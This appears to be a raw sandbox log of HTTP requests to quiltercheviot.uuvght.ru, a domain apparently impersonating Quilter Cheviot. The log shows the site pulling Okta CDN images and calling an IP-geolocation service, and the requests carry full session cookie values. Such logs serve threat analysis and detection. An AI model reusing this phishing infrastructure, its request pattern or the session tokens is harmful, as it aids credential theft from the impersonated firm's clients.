                Source: global trafficHTTP traffic detected: GET /wxEAvfh79xY931O7OkQQ5DeTPrst9wZU0uuvZgKtV34130 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklEcEpUVWNFMXBkYjJHTWlCS3I0SkE9PSIsInZhbHVlIjoiRU5TWmM4SmZCQWszMmw4QVZaKzNLN3d3eU56K29ramVmeFNFRWhPeUpYMGFPTHowYUVRbjdPbllvUVVVV3dKV0U1VTE3ZE1TOFRkUmpjdVcxV05VNWFXODdyWWdyeEhmNlRUOWk1TFc3U3Q1VkRqTEx1YmNLMjRMOHQwQXo1TWIiLCJtYWMiOiJmYmY5ZDcwMzU5MzEwN2M3Zjg3ODZmNjY3ZGJlNDI4M2JhZGM2OWJkYzU5ZDY3MDRlZWYyNmQxZjM4OTIwODAxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZVbXloM1A5Q2JZSWFPd0FJWDBGVWc9PSIsInZhbHVlIjoiZk5xODExV05VQVgwQnp0dHFVd0JmTHVQQTdtajBTaEQ5U3hIb0k1M3lnblE2ekxreFdXb3hYU2JRZndCWFZ5VWRzZ3JFdjlOWHhVQnhVZ0Z1Nkl4dFBHdWNBdlBkSEVNOEJYWXRDNVhaU1A3NFZ2bGcrZVc4dXBSSHlmdzcxWnYiLCJtYWMiOiJmOTVjYmMyZTNlNjQyZTFmMWM2ZDMxMTA5ZWFmZDk5Nzk5ZjVlZDMzYzEyMDNjYWYxYTdhNWExZjA3OWE2Y2FhIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /ij4ju2f5snoNTxMCJrxIedZBHZMU2Iz4yXZa0cdKQl2fDm9jTZe4c7rlVqysESBB56169 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklEcEpUVWNFMXBkYjJHTWlCS3I0SkE9PSIsInZhbHVlIjoiRU5TWmM4SmZCQWszMmw4QVZaKzNLN3d3eU56K29ramVmeFNFRWhPeUpYMGFPTHowYUVRbjdPbllvUVVVV3dKV0U1VTE3ZE1TOFRkUmpjdVcxV05VNWFXODdyWWdyeEhmNlRUOWk1TFc3U3Q1VkRqTEx1YmNLMjRMOHQwQXo1TWIiLCJtYWMiOiJmYmY5ZDcwMzU5MzEwN2M3Zjg3ODZmNjY3ZGJlNDI4M2JhZGM2OWJkYzU5ZDY3MDRlZWYyNmQxZjM4OTIwODAxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZVbXloM1A5Q2JZSWFPd0FJWDBGVWc9PSIsInZhbHVlIjoiZk5xODExV05VQVgwQnp0dHFVd0JmTHVQQTdtajBTaEQ5U3hIb0k1M3lnblE2ekxreFdXb3hYU2JRZndCWFZ5VWRzZ3JFdjlOWHhVQnhVZ0Z1Nkl4dFBHdWNBdlBkSEVNOEJYWXRDNVhaU1A3NFZ2bGcrZVc4dXBSSHlmdzcxWnYiLCJtYWMiOiJmOTVjYmMyZTNlNjQyZTFmMWM2ZDMxMTA5ZWFmZDk5Nzk5ZjVlZDMzYzEyMDNjYWYxYTdhNWExZjA3OWE2Y2FhIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /rshshJxZMD4moUnXROrGzvb6fdlKwG3xxgQnZl0THijFV3HtosSsaMM0Gw6eHHMCef192 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklEcEpUVWNFMXBkYjJHTWlCS3I0SkE9PSIsInZhbHVlIjoiRU5TWmM4SmZCQWszMmw4QVZaKzNLN3d3eU56K29ramVmeFNFRWhPeUpYMGFPTHowYUVRbjdPbllvUVVVV3dKV0U1VTE3ZE1TOFRkUmpjdVcxV05VNWFXODdyWWdyeEhmNlRUOWk1TFc3U3Q1VkRqTEx1YmNLMjRMOHQwQXo1TWIiLCJtYWMiOiJmYmY5ZDcwMzU5MzEwN2M3Zjg3ODZmNjY3ZGJlNDI4M2JhZGM2OWJkYzU5ZDY3MDRlZWYyNmQxZjM4OTIwODAxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZVbXloM1A5Q2JZSWFPd0FJWDBGVWc9PSIsInZhbHVlIjoiZk5xODExV05VQVgwQnp0dHFVd0JmTHVQQTdtajBTaEQ5U3hIb0k1M3lnblE2ekxreFdXb3hYU2JRZndCWFZ5VWRzZ3JFdjlOWHhVQnhVZ0Z1Nkl4dFBHdWNBdlBkSEVNOEJYWXRDNVhaU1A3NFZ2bGcrZVc4dXBSSHlmdzcxWnYiLCJtYWMiOiJmOTVjYmMyZTNlNjQyZTFmMWM2ZDMxMTA5ZWFmZDk5Nzk5ZjVlZDMzYzEyMDNjYWYxYTdhNWExZjA3OWE2Y2FhIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /qrP6RmVW07q5q2IzmAMefCmNGikm8kh7E6AP45140 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklEcEpUVWNFMXBkYjJHTWlCS3I0SkE9PSIsInZhbHVlIjoiRU5TWmM4SmZCQWszMmw4QVZaKzNLN3d3eU56K29ramVmeFNFRWhPeUpYMGFPTHowYUVRbjdPbllvUVVVV3dKV0U1VTE3ZE1TOFRkUmpjdVcxV05VNWFXODdyWWdyeEhmNlRUOWk1TFc3U3Q1VkRqTEx1YmNLMjRMOHQwQXo1TWIiLCJtYWMiOiJmYmY5ZDcwMzU5MzEwN2M3Zjg3ODZmNjY3ZGJlNDI4M2JhZGM2OWJkYzU5ZDY3MDRlZWYyNmQxZjM4OTIwODAxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZVbXloM1A5Q2JZSWFPd0FJWDBGVWc9PSIsInZhbHVlIjoiZk5xODExV05VQVgwQnp0dHFVd0JmTHVQQTdtajBTaEQ5U3hIb0k1M3lnblE2ekxreFdXb3hYU2JRZndCWFZ5VWRzZ3JFdjlOWHhVQnhVZ0Z1Nkl4dFBHdWNBdlBkSEVNOEJYWXRDNVhaU1A3NFZ2bGcrZVc4dXBSSHlmdzcxWnYiLCJtYWMiOiJmOTVjYmMyZTNlNjQyZTFmMWM2ZDMxMTA5ZWFmZDk5Nzk5ZjVlZDMzYzEyMDNjYWYxYTdhNWExZjA3OWE2Y2FhIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /ghiYmnsgxfRBtGaEoscjiskLiru2jTJXevHbPWHxkFklSwGnOZswRieoV0kMZoDk6v12210 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklEcEpUVWNFMXBkYjJHTWlCS3I0SkE9PSIsInZhbHVlIjoiRU5TWmM4SmZCQWszMmw4QVZaKzNLN3d3eU56K29ramVmeFNFRWhPeUpYMGFPTHowYUVRbjdPbllvUVVVV3dKV0U1VTE3ZE1TOFRkUmpjdVcxV05VNWFXODdyWWdyeEhmNlRUOWk1TFc3U3Q1VkRqTEx1YmNLMjRMOHQwQXo1TWIiLCJtYWMiOiJmYmY5ZDcwMzU5MzEwN2M3Zjg3ODZmNjY3ZGJlNDI4M2JhZGM2OWJkYzU5ZDY3MDRlZWYyNmQxZjM4OTIwODAxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZVbXloM1A5Q2JZSWFPd0FJWDBGVWc9PSIsInZhbHVlIjoiZk5xODExV05VQVgwQnp0dHFVd0JmTHVQQTdtajBTaEQ5U3hIb0k1M3lnblE2ekxreFdXb3hYU2JRZndCWFZ5VWRzZ3JFdjlOWHhVQnhVZ0Z1Nkl4dFBHdWNBdlBkSEVNOEJYWXRDNVhaU1A3NFZ2bGcrZVc4dXBSSHlmdzcxWnYiLCJtYWMiOiJmOTVjYmMyZTNlNjQyZTFmMWM2ZDMxMTA5ZWFmZDk5Nzk5ZjVlZDMzYzEyMDNjYWYxYTdhNWExZjA3OWE2Y2FhIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /qrNROqivBHGeLbBOhClY7GZWtq7YPg4tOUKDNS8VcsMyYNAuvDqOSMcRbEguUbLoPuu0pdeAHcd240 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklEcEpUVWNFMXBkYjJHTWlCS3I0SkE9PSIsInZhbHVlIjoiRU5TWmM4SmZCQWszMmw4QVZaKzNLN3d3eU56K29ramVmeFNFRWhPeUpYMGFPTHowYUVRbjdPbllvUVVVV3dKV0U1VTE3ZE1TOFRkUmpjdVcxV05VNWFXODdyWWdyeEhmNlRUOWk1TFc3U3Q1VkRqTEx1YmNLMjRMOHQwQXo1TWIiLCJtYWMiOiJmYmY5ZDcwMzU5MzEwN2M3Zjg3ODZmNjY3ZGJlNDI4M2JhZGM2OWJkYzU5ZDY3MDRlZWYyNmQxZjM4OTIwODAxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZVbXloM1A5Q2JZSWFPd0FJWDBGVWc9PSIsInZhbHVlIjoiZk5xODExV05VQVgwQnp0dHFVd0JmTHVQQTdtajBTaEQ5U3hIb0k1M3lnblE2ekxreFdXb3hYU2JRZndCWFZ5VWRzZ3JFdjlOWHhVQnhVZ0Z1Nkl4dFBHdWNBdlBkSEVNOEJYWXRDNVhaU1A3NFZ2bGcrZVc4dXBSSHlmdzcxWnYiLCJtYWMiOiJmOTVjYmMyZTNlNjQyZTFmMWM2ZDMxMTA5ZWFmZDk5Nzk5ZjVlZDMzYzEyMDNjYWYxYTdhNWExZjA3OWE2Y2FhIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /efxsGgZ9g96NYVuIvRwEYQSx0A8SVy5blklUrKSSj9iyc6co8Jt78146 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklEcEpUVWNFMXBkYjJHTWlCS3I0SkE9PSIsInZhbHVlIjoiRU5TWmM4SmZCQWszMmw4QVZaKzNLN3d3eU56K29ramVmeFNFRWhPeUpYMGFPTHowYUVRbjdPbllvUVVVV3dKV0U1VTE3ZE1TOFRkUmpjdVcxV05VNWFXODdyWWdyeEhmNlRUOWk1TFc3U3Q1VkRqTEx1YmNLMjRMOHQwQXo1TWIiLCJtYWMiOiJmYmY5ZDcwMzU5MzEwN2M3Zjg3ODZmNjY3ZGJlNDI4M2JhZGM2OWJkYzU5ZDY3MDRlZWYyNmQxZjM4OTIwODAxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZVbXloM1A5Q2JZSWFPd0FJWDBGVWc9PSIsInZhbHVlIjoiZk5xODExV05VQVgwQnp0dHFVd0JmTHVQQTdtajBTaEQ5U3hIb0k1M3lnblE2ekxreFdXb3hYU2JRZndCWFZ5VWRzZ3JFdjlOWHhVQnhVZ0Z1Nkl4dFBHdWNBdlBkSEVNOEJYWXRDNVhaU1A3NFZ2bGcrZVc4dXBSSHlmdzcxWnYiLCJtYWMiOiJmOTVjYmMyZTNlNjQyZTFmMWM2ZDMxMTA5ZWFmZDk5Nzk5ZjVlZDMzYzEyMDNjYWYxYTdhNWExZjA3OWE2Y2FhIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://quiltercheviot.uuvght.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /wxw1sZOySil8NEjvIYFtxD8u66tYQYXgQQAmnPjgqr0tgkbNH5Tke3Rab171 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklEcEpUVWNFMXBkYjJHTWlCS3I0SkE9PSIsInZhbHVlIjoiRU5TWmM4SmZCQWszMmw4QVZaKzNLN3d3eU56K29ramVmeFNFRWhPeUpYMGFPTHowYUVRbjdPbllvUVVVV3dKV0U1VTE3ZE1TOFRkUmpjdVcxV05VNWFXODdyWWdyeEhmNlRUOWk1TFc3U3Q1VkRqTEx1YmNLMjRMOHQwQXo1TWIiLCJtYWMiOiJmYmY5ZDcwMzU5MzEwN2M3Zjg3ODZmNjY3ZGJlNDI4M2JhZGM2OWJkYzU5ZDY3MDRlZWYyNmQxZjM4OTIwODAxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZVbXloM1A5Q2JZSWFPd0FJWDBGVWc9PSIsInZhbHVlIjoiZk5xODExV05VQVgwQnp0dHFVd0JmTHVQQTdtajBTaEQ5U3hIb0k1M3lnblE2ekxreFdXb3hYU2JRZndCWFZ5VWRzZ3JFdjlOWHhVQnhVZ0Z1Nkl4dFBHdWNBdlBkSEVNOEJYWXRDNVhaU1A3NFZ2bGcrZVc4dXBSSHlmdzcxWnYiLCJtYWMiOiJmOTVjYmMyZTNlNjQyZTFmMWM2ZDMxMTA5ZWFmZDk5Nzk5ZjVlZDMzYzEyMDNjYWYxYTdhNWExZjA3OWE2Y2FhIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /st1Db2ykjfYABIo1c7bMik440A2uivFvcyDDUDxbbHMMLX5lpn867VGTAn6EJhdvlX8cZHuBdooVGYagJwegh260 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://quiltercheviot.uuvght.ru/PCYXCWFOKIFLAIXDZJOUSUHSDR8097hms554imnm7gwq1z7?ZTSQFCBSVOBQMVHQXHEYQFLKLAFDXWAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklEcEpUVWNFMXBkYjJHTWlCS3I0SkE9PSIsInZhbHVlIjoiRU5TWmM4SmZCQWszMmw4QVZaKzNLN3d3eU56K29ramVmeFNFRWhPeUpYMGFPTHowYUVRbjdPbllvUVVVV3dKV0U1VTE3ZE1TOFRkUmpjdVcxV05VNWFXODdyWWdyeEhmNlRUOWk1TFc3U3Q1VkRqTEx1YmNLMjRMOHQwQXo1TWIiLCJtYWMiOiJmYmY5ZDcwMzU5MzEwN2M3Zjg3ODZmNjY3ZGJlNDI4M2JhZGM2OWJkYzU5ZDY3MDRlZWYyNmQxZjM4OTIwODAxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZVbXloM1A5Q2JZSWFPd0FJWDBGVWc9PSIsInZhbHVlIjoiZk5xODExV05VQVgwQnp0dHFVd0JmTHVQQTdtajBTaEQ5U3hIb0k1M3lnblE2ekxreFdXb3hYU2JRZndCWFZ5VWRzZ3JFdjlOWHhVQnhVZ0Z1Nkl4dFBHdWNBdlBkSEVNOEJYWXRDNVhaU1A3NFZ2bGcrZVc4dXBSSHlmdzcxWnYiLCJtYWMiOiJmOTVjYmMyZTNlNjQyZTFmMWM2ZDMxMTA5ZWFmZDk5Nzk5ZjVlZDMzYzEyMDNjYWYxYTdhNWExZjA3OWE2Y2FhIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /rshshJxZMD4moUnXROrGzvb6fdlKwG3xxgQnZl0THijFV3HtosSsaMM0Gw6eHHMCef192 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklEcEpUVWNFMXBkYjJHTWlCS3I0SkE9PSIsInZhbHVlIjoiRU5TWmM4SmZCQWszMmw4QVZaKzNLN3d3eU56K29ramVmeFNFRWhPeUpYMGFPTHowYUVRbjdPbllvUVVVV3dKV0U1VTE3ZE1TOFRkUmpjdVcxV05VNWFXODdyWWdyeEhmNlRUOWk1TFc3U3Q1VkRqTEx1YmNLMjRMOHQwQXo1TWIiLCJtYWMiOiJmYmY5ZDcwMzU5MzEwN2M3Zjg3ODZmNjY3ZGJlNDI4M2JhZGM2OWJkYzU5ZDY3MDRlZWYyNmQxZjM4OTIwODAxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZVbXloM1A5Q2JZSWFPd0FJWDBGVWc9PSIsInZhbHVlIjoiZk5xODExV05VQVgwQnp0dHFVd0JmTHVQQTdtajBTaEQ5U3hIb0k1M3lnblE2ekxreFdXb3hYU2JRZndCWFZ5VWRzZ3JFdjlOWHhVQnhVZ0Z1Nkl4dFBHdWNBdlBkSEVNOEJYWXRDNVhaU1A3NFZ2bGcrZVc4dXBSSHlmdzcxWnYiLCJtYWMiOiJmOTVjYmMyZTNlNjQyZTFmMWM2ZDMxMTA5ZWFmZDk5Nzk5ZjVlZDMzYzEyMDNjYWYxYTdhNWExZjA3OWE2Y2FhIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /qrNROqivBHGeLbBOhClY7GZWtq7YPg4tOUKDNS8VcsMyYNAuvDqOSMcRbEguUbLoPuu0pdeAHcd240 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklEcEpUVWNFMXBkYjJHTWlCS3I0SkE9PSIsInZhbHVlIjoiRU5TWmM4SmZCQWszMmw4QVZaKzNLN3d3eU56K29ramVmeFNFRWhPeUpYMGFPTHowYUVRbjdPbllvUVVVV3dKV0U1VTE3ZE1TOFRkUmpjdVcxV05VNWFXODdyWWdyeEhmNlRUOWk1TFc3U3Q1VkRqTEx1YmNLMjRMOHQwQXo1TWIiLCJtYWMiOiJmYmY5ZDcwMzU5MzEwN2M3Zjg3ODZmNjY3ZGJlNDI4M2JhZGM2OWJkYzU5ZDY3MDRlZWYyNmQxZjM4OTIwODAxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZVbXloM1A5Q2JZSWFPd0FJWDBGVWc9PSIsInZhbHVlIjoiZk5xODExV05VQVgwQnp0dHFVd0JmTHVQQTdtajBTaEQ5U3hIb0k1M3lnblE2ekxreFdXb3hYU2JRZndCWFZ5VWRzZ3JFdjlOWHhVQnhVZ0Z1Nkl4dFBHdWNBdlBkSEVNOEJYWXRDNVhaU1A3NFZ2bGcrZVc4dXBSSHlmdzcxWnYiLCJtYWMiOiJmOTVjYmMyZTNlNjQyZTFmMWM2ZDMxMTA5ZWFmZDk5Nzk5ZjVlZDMzYzEyMDNjYWYxYTdhNWExZjA3OWE2Y2FhIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /ghiYmnsgxfRBtGaEoscjiskLiru2jTJXevHbPWHxkFklSwGnOZswRieoV0kMZoDk6v12210 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklEcEpUVWNFMXBkYjJHTWlCS3I0SkE9PSIsInZhbHVlIjoiRU5TWmM4SmZCQWszMmw4QVZaKzNLN3d3eU56K29ramVmeFNFRWhPeUpYMGFPTHowYUVRbjdPbllvUVVVV3dKV0U1VTE3ZE1TOFRkUmpjdVcxV05VNWFXODdyWWdyeEhmNlRUOWk1TFc3U3Q1VkRqTEx1YmNLMjRMOHQwQXo1TWIiLCJtYWMiOiJmYmY5ZDcwMzU5MzEwN2M3Zjg3ODZmNjY3ZGJlNDI4M2JhZGM2OWJkYzU5ZDY3MDRlZWYyNmQxZjM4OTIwODAxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZVbXloM1A5Q2JZSWFPd0FJWDBGVWc9PSIsInZhbHVlIjoiZk5xODExV05VQVgwQnp0dHFVd0JmTHVQQTdtajBTaEQ5U3hIb0k1M3lnblE2ekxreFdXb3hYU2JRZndCWFZ5VWRzZ3JFdjlOWHhVQnhVZ0Z1Nkl4dFBHdWNBdlBkSEVNOEJYWXRDNVhaU1A3NFZ2bGcrZVc4dXBSSHlmdzcxWnYiLCJtYWMiOiJmOTVjYmMyZTNlNjQyZTFmMWM2ZDMxMTA5ZWFmZDk5Nzk5ZjVlZDMzYzEyMDNjYWYxYTdhNWExZjA3OWE2Y2FhIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /st1Db2ykjfYABIo1c7bMik440A2uivFvcyDDUDxbbHMMLX5lpn867VGTAn6EJhdvlX8cZHuBdooVGYagJwegh260 HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklEcEpUVWNFMXBkYjJHTWlCS3I0SkE9PSIsInZhbHVlIjoiRU5TWmM4SmZCQWszMmw4QVZaKzNLN3d3eU56K29ramVmeFNFRWhPeUpYMGFPTHowYUVRbjdPbllvUVVVV3dKV0U1VTE3ZE1TOFRkUmpjdVcxV05VNWFXODdyWWdyeEhmNlRUOWk1TFc3U3Q1VkRqTEx1YmNLMjRMOHQwQXo1TWIiLCJtYWMiOiJmYmY5ZDcwMzU5MzEwN2M3Zjg3ODZmNjY3ZGJlNDI4M2JhZGM2OWJkYzU5ZDY3MDRlZWYyNmQxZjM4OTIwODAxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZVbXloM1A5Q2JZSWFPd0FJWDBGVWc9PSIsInZhbHVlIjoiZk5xODExV05VQVgwQnp0dHFVd0JmTHVQQTdtajBTaEQ5U3hIb0k1M3lnblE2ekxreFdXb3hYU2JRZndCWFZ5VWRzZ3JFdjlOWHhVQnhVZ0Z1Nkl4dFBHdWNBdlBkSEVNOEJYWXRDNVhaU1A3NFZ2bGcrZVc4dXBSSHlmdzcxWnYiLCJtYWMiOiJmOTVjYmMyZTNlNjQyZTFmMWM2ZDMxMTA5ZWFmZDk5Nzk5ZjVlZDMzYzEyMDNjYWYxYTdhNWExZjA3OWE2Y2FhIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://quiltercheviot.uuvght.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://quiltercheviot.uuvght.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
